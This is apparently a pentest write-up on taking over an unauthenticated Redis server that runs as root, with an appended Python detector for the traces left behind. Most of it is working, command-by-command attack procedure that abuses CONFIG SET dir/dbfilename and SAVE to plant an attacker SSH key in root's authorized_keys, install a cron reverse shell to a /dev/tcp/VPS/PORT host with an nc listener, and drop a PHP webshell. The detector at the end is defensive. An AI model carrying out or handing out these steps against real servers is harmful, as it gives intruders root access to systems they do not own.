(1) Write an ssh-keygen public key, then log in with the private key
This method can be used under the following conditions:
The Redis service was started under the root account
The server exposes an SSH service and allows key-based login, so a public key can be written remotely and used to log straight into the remote server.
1: Generate an SSH key pair locally
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:P24CPwgr75TtlEAgIY95v7mcAWpd7S6N1KGhi7hHO6s root@kali
The key's randomart image is:
+--[RSA 3072]----+
|+... |
|.= . |
|o o . |
| . o ... |
| . +.+.S |
| .oooOoo . |
|oo.oOo*= o |
|o.=+.Oo.+... |
|E+.** o. +. |
+---[SHA256]-----+
2: Then write the public key content to a file
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
3: Send the content to the remote Redis server
cat test.txt | redis-cli -h IP -x set test
4: Log in to the remote server and view the public key
redis-cli -h IP
keys *
get test
5: View the current directory and file name
config get dir
config get dbfilename
6: Change the directory
config set dir "/root/.ssh/"
7: Change the saved file name
config set dbfilename "authorized_keys"
8: Save
save
9: Connect
ssh -i id_rsa IP -l root
10: Delete the key
(2) Use a scheduled task (cron) to execute a command and get a reverse shell
1: Listen on a port on the attacker machine
nc -lvnp PORT
2: Run the commands in Redis
redis-cli -h IP
set x "\n* * * * * bash -i >& /dev/tcp/VPS/PORT 0>&1\n"
3: Change the directory
config set dir /var/spool/cron/
4: Change the saved file name
config set dbfilename root
5: Save
save
(3) Write a webshell to the web root
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
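All three procedures above leave the same artifact on disk: the target file is replaced by a Redis RDB dump, which begins with the magic bytes REDIS plus a version number, with the planted value embedded as the only clean text line. The detector below is an added example (not from the original post): WATCHED_PATHS are the paths used above, and the byte strings in SAMPLES are constructed, not real dumps.

```python
import os
import re

# Every RDB dump starts with "REDIS" plus a four-digit format version.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")

# Files the write-up above shows being overwritten via CONFIG SET dir/dbfilename + SAVE.
WATCHED_PATHS = ["/root/.ssh/authorized_keys", "/var/spool/cron/root", "/var/www/html/shell.php"]

def looks_like_rdb(data: bytes) -> bool:
    """True when the file body begins with an RDB header, i.e. Redis SAVE produced it."""
    return RDB_MAGIC.match(data) is not None

def extract_payload(data: bytes) -> list:
    """Fully printable lines (>= 8 chars) inside the file: the consumers of these files skip
    past the binary RDB framing, so the planted value shows up as the only clean text line."""
    return [line.decode("ascii") for line in data.split(b"\n")
            if len(line) >= 8 and all(32 <= c < 127 for c in line)]

def scan(files: dict) -> dict:
    """path -> {'rdb_header': bool, 'payload': [lines]} for in-memory file contents."""
    return {p: {"rdb_header": looks_like_rdb(d), "payload": extract_payload(d)}
            for p, d in files.items()}

def alerts(files: dict) -> list:
    """Paths whose content is an RDB dump, i.e. a sensitive file was replaced by Redis."""
    return [p for p, r in scan(files).items() if r["rdb_header"]]

def scan_disk(paths=WATCHED_PATHS) -> list:
    """Read the watched files present on this host and return the RDB-overwritten ones."""
    present = {}
    for p in paths:
        if os.path.isfile(p):
            with open(p, "rb") as fh:
                present[p] = fh.read()
    return alerts(present)

# Constructed samples (not real dumps): minimal RDB framing around the planted value.
SAMPLES = {
    "/root/.ssh/authorized_keys": (
        b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x04test\x2c"
        b"\n\n\nssh-rsa AAAAB3NzaC1yc2E_EXAMPLE root@kali\n\n\n\n"
        b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"),
    "/var/spool/cron/root": (
        b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x01x\x16"
        b"\n* * * * * echo beacon\n\xff\x00\x00\x00\x00\x00\x00\x00\x00"),
    "/var/www/html/index.php": b"<?php echo 'hello'; ?>\n",  # legitimate file, no header
}
```

Run scan_disk() as root on a host to check the real files; alerts(SAMPLES) shows the two constructed dumps being flagged while the legitimate PHP file is not.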